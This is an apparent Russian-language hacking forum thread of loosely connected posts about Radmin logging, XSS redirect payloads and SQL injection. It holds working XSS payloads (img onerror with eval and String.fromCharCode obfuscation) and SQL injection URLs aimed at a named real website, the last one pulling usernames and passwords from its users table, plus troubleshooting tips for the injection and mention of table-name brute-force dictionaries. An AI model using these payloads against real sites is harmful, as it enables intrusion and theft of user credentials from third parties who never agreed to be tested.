Ктонить знает, радмин в2.1 и в 2.2 по умалчанию хранит ли логи? Стоит мне об этом беспокоиться? Плиз. дайте совет. (с меня +)
Всё обыскал, всех опросил, ну никто не знает хранит ли Радмин логи по умАлчанию(( так что ничем помочь наверно не смогу. Но вот мануаль,который так трудно было найти на сайте производителя Радмин, и в гугле его вобще нет на первом месте в странице результатов (ССылка на мануаль, ВЫ ТОЛЬКО ПРЕДСТАВЬТЕ!!!!!!! на ВТОРОМ МЕСТЕ!!ААА..какой ужас) предложил вариант со словом умОлчание, хотя это конечно бред скорее всего, но может и что-то полезное будет. Для тех,кто не хочет тратить свое время, я подчеркиваю, для ДОЛБО..ой, то есть для Exploit, привожу фрагмент мануала:
Возможноли через конструкцию выполнения скрипта javascript:.... (например javascript=alert()) сделать код для редиректа ? Например с использованием eval - javascript:eval("злой_код") И как это можно сделать. А если низя, то почему ?
<img src=. onerror=eval("document.location.href='http://google.com/';")> <img src=. onerror=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,108,111,99,97,116,105,111,110,46,104,114,101,102,61,39,104,116,116,112,58,47,47,103,111,111,103,108,101,46,99,111,109,47,39,59))> Думаю понятно. вместо "=" должно быть ":", хотя подозреваю, что просто опечатка)
Понятно, но я не это имел ввиду. Нужно чтото вроде <img src="javascript:ЗЛОЙ_КОД_ДЛЯ_РЕДИРЕКТА"> спросите почему так - потомучто что я не слова неговорил про img вообще, а если тег не img и нету в теге параметров типа onerror... А есть проста возможность вставить куданибуть конструкцию javascript:... вот в чем вся соль (с) ...
src=javscript:eval("document.location.href='http://google.com/';") src=javscript:eval(String.fromCharCode(100,111,99,117,10 9,101,110,116,46,108,111,99,97,116,105,111,110,46, 104,114,101,102,61,39,104,116,116,112,58,47,47,103 ,111,111,103,108,101,46,99,111,109,47,39,59)) Не вижу никакой разницы.
Не могу понять, в HTML: http://www.dialog.kz/?lan=ru&id=92&pub=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14-- все норм показывает, видимые поля есть, все дела. Как только ввожу HTML: http://www.dialog.kz/?lan=ru&id=92&pub=-1+union+select+1,2,3,4,5,6,7,table_name,9,10,11,12,13,14+from+information_schema.tables-- показывает ошибку, что за беда подскажите плз.
Gemini12, коментарий "--" требует пробел в конце. Во вторых версия мускула 4я, в ней нет information_schema.
2 Gemini12: такого списка нет. Есть словари для брута - таблиц и колонок. Имеются в комплекте у SIPT4. У всех разные. У кого больше, у кого меньше
Есть уязвимость на одном популярном(!) сервисе (форуме). На оооочень популярном. Каждый античатовец знает его, или был там хотя бы раз. Уязвимость заключается в том, что на форум можно заливать файл на любой(!) пост. Пример: мой ник mailbrush. Ник юзера, скажем hackadmin. hackadmin написал пост бла бла бла, онтоле похекал майкрософт. Я могу к этому посту прилепить свой файл. Стоит ли эта уязвимость отдельной темы в разделе "УЯЗВИМОСТИ" или пока держать это в привате?
Чего полезного из этого можно извлечь ? http://www.dialog.kz/?lan=ru&id=92&pub=-1+union+select+1,2,3,4,concat_ws(0x2F,username,userpass),6,7,8,9,10,11,12,13,14+from+users--+